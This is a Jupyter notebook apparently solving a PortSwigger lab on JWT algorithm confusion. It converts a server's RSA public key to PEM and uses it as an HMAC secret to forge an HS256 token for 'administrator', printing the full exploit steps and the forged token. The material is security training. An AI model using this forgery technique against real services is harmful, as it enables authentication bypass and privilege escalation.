## Obtain server public key
See https://portswigger.net/web-security/jwt/algorithm-confusion.

The `jwks_json` string is `jwks.json` served from the root of the lab web server.

In [1]:
jwks_json = '{"keys":[{"kty":"RSA","e":"AQAB","use":"sig","kid":"f2cfad7d-28af-406b-90fc-c45e31efe7c8","alg":"RS256","n":"p8xzHe3muuc_O97dEgnu725qGezv_F751wKfypCuVgKcIz6W0Iuw7HK6Uzxqlw3La-QWYLMDz4fszDoihgT9ZcsbQqfZRDybm4fvpnpm-m8uO45vdyJWio4P_mblTjccSXs_nchCBZU1xnoEazQM-rIYZD7XSgex3hEE2hc-ZedEQooTfLAEU6hYAiyueGEvl2VSH51CArhbORFkeRJVY5z4c06y2TWKQwpaOu60KedlnEM-YIOO79N_kirlyHO2ISQZe9tQbJd3rEnr3yjSTEz5wViTE4N044V5oyUrsmJGG1HE8J2r48W7UgfpynIhjKTrwnOwsS3aM4s87-E8qQ"}]}'

## Convert public key to PEM format

In [2]:
import json

In [3]:
jwks = json.loads(jwks_json)
jwks

{'keys': [{'kty': 'RSA',
   'e': 'AQAB',
   'use': 'sig',
   'kid': 'f2cfad7d-28af-406b-90fc-c45e31efe7c8',
   'alg': 'RS256',
   'n': 'p8xzHe3muuc_O97dEgnu725qGezv_F751wKfypCuVgKcIz6W0Iuw7HK6Uzxqlw3La-QWYLMDz4fszDoihgT9ZcsbQqfZRDybm4fvpnpm-m8uO45vdyJWio4P_mblTjccSXs_nchCBZU1xnoEazQM-rIYZD7XSgex3hEE2hc-ZedEQooTfLAEU6hYAiyueGEvl2VSH51CArhbORFkeRJVY5z4c06y2TWKQwpaOu60KedlnEM-YIOO79N_kirlyHO2ISQZe9tQbJd3rEnr3yjSTEz5wViTE4N044V5oyUrsmJGG1HE8J2r48W7UgfpynIhjKTrwnOwsS3aM4s87-E8qQ'}]}

In [4]:
# jwk.JWK.from_json() needs kty parameter to be defined.
jwks['keys'][0]['kty'] = "RSA"

In [5]:
jwks['keys'][0]

{'kty': 'RSA',
 'e': 'AQAB',
 'use': 'sig',
 'kid': 'f2cfad7d-28af-406b-90fc-c45e31efe7c8',
 'alg': 'RS256',
 'n': 'p8xzHe3muuc_O97dEgnu725qGezv_F751wKfypCuVgKcIz6W0Iuw7HK6Uzxqlw3La-QWYLMDz4fszDoihgT9ZcsbQqfZRDybm4fvpnpm-m8uO45vdyJWio4P_mblTjccSXs_nchCBZU1xnoEazQM-rIYZD7XSgex3hEE2hc-ZedEQooTfLAEU6hYAiyueGEvl2VSH51CArhbORFkeRJVY5z4c06y2TWKQwpaOu60KedlnEM-YIOO79N_kirlyHO2ISQZe9tQbJd3rEnr3yjSTEz5wViTE4N044V5oyUrsmJGG1HE8J2r48W7UgfpynIhjKTrwnOwsS3aM4s87-E8qQ'}

In [6]:
from jwcrypto import jwk

In [7]:
key = jwk.JWK.from_json(json.dumps(jwks['keys'][0]))

In [8]:
pem = key.export_to_pem()
pem

b'-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAp8xzHe3muuc/O97dEgnu\n725qGezv/F751wKfypCuVgKcIz6W0Iuw7HK6Uzxqlw3La+QWYLMDz4fszDoihgT9\nZcsbQqfZRDybm4fvpnpm+m8uO45vdyJWio4P/mblTjccSXs/nchCBZU1xnoEazQM\n+rIYZD7XSgex3hEE2hc+ZedEQooTfLAEU6hYAiyueGEvl2VSH51CArhbORFkeRJV\nY5z4c06y2TWKQwpaOu60KedlnEM+YIOO79N/kirlyHO2ISQZe9tQbJd3rEnr3yjS\nTEz5wViTE4N044V5oyUrsmJGG1HE8J2r48W7UgfpynIhjKTrwnOwsS3aM4s87+E8\nqQIDAQAB\n-----END PUBLIC KEY-----\n'

## Create malicious JWT
Modify payload and set `alg` header.

In [9]:
headers = {
    "kid": "f2cfad7d-28af-406b-90fc-c45e31efe7c8",
    "alg": "HS256"
}

In [10]:
payload = {
    "iss": "portswigger",
    "sub": "administrator",
    "exp": 1684346314
}

In [11]:
import jwt

Looks like PyJWT can detect when you try to sign a JWT with a questionable HMAC secret. :-D

In [12]:
encoded = jwt.encode(payload, pem, headers=headers, algorithm="HS256")

InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.

Guess we need to put together the malicious JWT "by hand" then.

In [13]:
headers_json = json.dumps(headers).encode()
headers_json

b'{"kid": "f2cfad7d-28af-406b-90fc-c45e31efe7c8", "alg": "HS256"}'

In [14]:
payload_json = json.dumps(payload).encode()
payload_json

b'{"iss": "portswigger", "sub": "administrator", "exp": 1684346314}'

In [15]:
import base64
DELIMITER = b'.'

In [16]:
data = base64.urlsafe_b64encode(headers_json) + DELIMITER + base64.urlsafe_b64encode(payload_json)
data


b'eyJraWQiOiAiZjJjZmFkN2QtMjhhZi00MDZiLTkwZmMtYzQ1ZTMxZWZlN2M4IiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiAicG9ydHN3aWdnZXIiLCAic3ViIjogImFkbWluaXN0cmF0b3IiLCAiZXhwIjogMTY4NDM0NjMxNH0='

## Sign the JWT

In [17]:
import hmac

In [18]:
digest = hmac.new(pem, msg=data, digestmod='sha256').digest()
digest

b'kV\xf3\xbbz\x1a\xf1\xd7\xfb\xbc \x8by\xd0\xa5z\xddz\x1fq\x00\xa0Pn\x04.\x06U\xbf\xce\xfbz'

In [19]:
tag = base64.urlsafe_b64encode(digest).rstrip(b'=') # Note we strip trailing padding chars.
tag

b'a1bzu3oa8df7vCCLedClet16H3EAoFBuBC4GVb_O-3o'

In [20]:
jwt_encoded = data + DELIMITER + tag
jwt_encoded

b'eyJraWQiOiAiZjJjZmFkN2QtMjhhZi00MDZiLTkwZmMtYzQ1ZTMxZWZlN2M4IiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiAicG9ydHN3aWdnZXIiLCAic3ViIjogImFkbWluaXN0cmF0b3IiLCAiZXhwIjogMTY4NDM0NjMxNH0=.a1bzu3oa8df7vCCLedClet16H3EAoFBuBC4GVb_O-3o'